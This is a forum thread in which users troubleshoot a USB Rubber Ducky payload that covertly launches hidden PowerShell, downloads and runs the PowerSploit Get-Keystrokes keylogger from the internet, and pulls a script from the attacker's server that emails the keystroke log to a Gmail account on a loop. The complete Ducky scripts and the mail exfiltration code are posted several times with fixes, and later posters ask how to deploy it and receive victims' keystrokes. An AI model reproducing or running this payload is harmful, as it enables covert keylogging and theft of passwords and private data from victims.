PoSHMagiC0de Posted April 27, 2018 Posted April 27, 2018 (edited) Just guessing but the issue might be on this line. I don't use smtpclient in Powershell but instead use send-mailmessage. But...the issue with the smtpclient in the script maybe this and the correction that may need to happen. while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} should be maybe??? while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} The attachment of the mailmessage object takes an attachment object. Edited April 27, 2018 by PoSHMagiC0de forgot extra parenthesis. Quote
714Lemons Posted April 28, 2018 Posted April 28, 2018 Hey my Problem is that Things like //:https are written in powershell like ähttpsÖ any ideas how to fix this? Quote
mrskannk Posted April 30, 2018 Posted April 30, 2018 On 4/27/2018 at 4:16 AM, PoSHMagiC0de said: Just guessing but the issue might be on this line. I don't use smtpclient in Powershell but instead use send-mailmessage. But...the issue with the smtpclient in the script maybe this and the correction that may need to happen. while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} should be maybe??? while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} The attachment of the mailmessage object takes an attachment object. Hey thank for reply , y try to modify the mail.ps1 with while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} i'm still getting the same issue .. empty emails. I can't solve this probleme ? Quote
PoSHMagiC0de Posted April 30, 2018 Posted April 30, 2018 Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location. Where ever $env:temp points to. If you type that out in powershell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. if you get no key.txt or no stuff in it then the keylogger is not logging. Quote
mrskannk Posted April 30, 2018 Posted April 30, 2018 31 minutes ago, PoSHMagiC0de said: Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location. Where ever $env:temp points to. If you type that out in powershell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. if you get no key.txt or no stuff in it then the keylogger is not logging. Nop , i ad a look on %temp% et there is no log.txt created tryed both script , same issue . Getting empty mails https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1 https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1 Quote
PoSHMagiC0de Posted April 30, 2018 Posted April 30, 2018 Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. The default if ran on its own with no parameters it should create a key.log. in the temp folder. The line below in the payload.txt changes that to key.txt if ran with it. STRING Get-Keystrokes -LogPath $env:temp\key.txt So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run powershell and then run each line. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') #For Default path. Get-Keystrokes #To place it on your desktop do and look for keylog.txt to popup. Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it or closing the Powershell window will do the same I believe. I have to test. I do not have my test machine up to test so going off of what I read inside all the scripts. <ight want to check your AV too. The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked. Quote
mrskannk Posted April 30, 2018 Posted April 30, 2018 (edited) 19 minutes ago, PoSHMagiC0de said: Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. The default if ran on its own with no parameters it should create a key.log. in the temp folder. The line below in the payload.txt changes that to key.txt if ran with it. STRING Get-Keystrokes -LogPath $env:temp\key.txt So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run powershell and then run each line. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') #For Default path. Get-Keystrokes #To place it on your desktop do and look for keylog.txt to popup. Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it or closing the Powershell window will do the same I believe. I have to test. I do not have my test machine up to test so going off of what I read inside all the scripts. <ight want to check your AV too. The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked. Thank's , so if a got it right tue script should look like this . I'm going to try in a sec So if a followed you right tu script should look like this DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'xxxx@gmail.com' $ReportEmail.To.Add('xxxx@gmail.com') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} Edited April 30, 2018 by mrskannk Quote
PoSHMagiC0de Posted April 30, 2018 Posted April 30, 2018 Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer. Ignore it for now. What you are going to have to do is verify the payload works without the RD or BB. If it doesn't work without it on your test machine then it definitely will not work being launched from the device. So, above I was trying to have you just jump on your test machine. Run powershell and just use the two line commands I put out. The first will download and launch get-keystokes function to memory for use. Second and third was to run the get-keystrokes as default which should write the key.log file to your temp folder on your machine or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong but atleast you may get an error message if it does. If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email. So, ignore the RD for now until you know the scripts work. Now if it does then try and run the payload by hand. That means playing out by hand what the payload does to see if everything works. Quote
DimiBoy Posted June 5, 2018 Posted June 5, 2018 Well if you like I made a video of another version which sends an email after the timer is passed on the keylogger with the log. I think it might actually be useful for developers (ye I might be naive)https://www.youtube.com/watch?v=iAH5ruyo2VY Quote
Félix Thiollize Posted October 23, 2021 Posted October 23, 2021 Hello everyone, I''ve been trying for days to transform this script so that it can send me the file with the results to my private server and not my email. Does anyone have any idea concerning the Ducky or powershell code ? Thank you Good evening Quote
khalilzerei999 Posted January 16, 2022 Posted January 16, 2022 On 3/8/2017 at 6:57 AM, Speed09 said: I'm not good at powershell at all, but I managed to get the exfiltrate working. I simply modified the payload to run a ps script from my server that will send me the log file via email. Here is the final ducky script: DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1') ENTER And here is the mail.ps1 content: $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'youradress@gmail.com' $ReportEmail.To.Add('youradress@gmail.com') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} hi im a beginner and i use a micro pro arduino board as a rubber ducky what should i change from this script as personal information?? please i need help Quote
dark_pyrro Posted January 16, 2022 Posted January 16, 2022 I guess that the end of that quote is actually your question. I'd suggest that you ask the question in some forum (or whatever) that is relevant to your hardware since you obviously isn't using a Hak5 USB Rubber Ducky. Quote
Johnny Sky Posted May 23 Posted May 23 Hi I’m just confused what do I put for ('http://myserver/mail.ps1') because I tried it and I won’t get or received any emails Quote
dark_pyrro Posted May 23 Posted May 23 Something that points to where you store the mail.ps1 file on the internet (or any server location that the target might have access to). Quote
Miller K Posted May 24 Posted May 24 Hi once I inject the payload key logger how do I receive key strokes to my gmail I’ve tried putting in my email and password..? Quote
dark_pyrro Posted May 24 Posted May 24 Did you set up the Gmail side of it all so that you allow sending using SMTP with the specific account that is being used? Quote
dark_pyrro Posted May 25 Posted May 25 Did you verify manually that it's possible to successfully do the same steps as the payload does? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.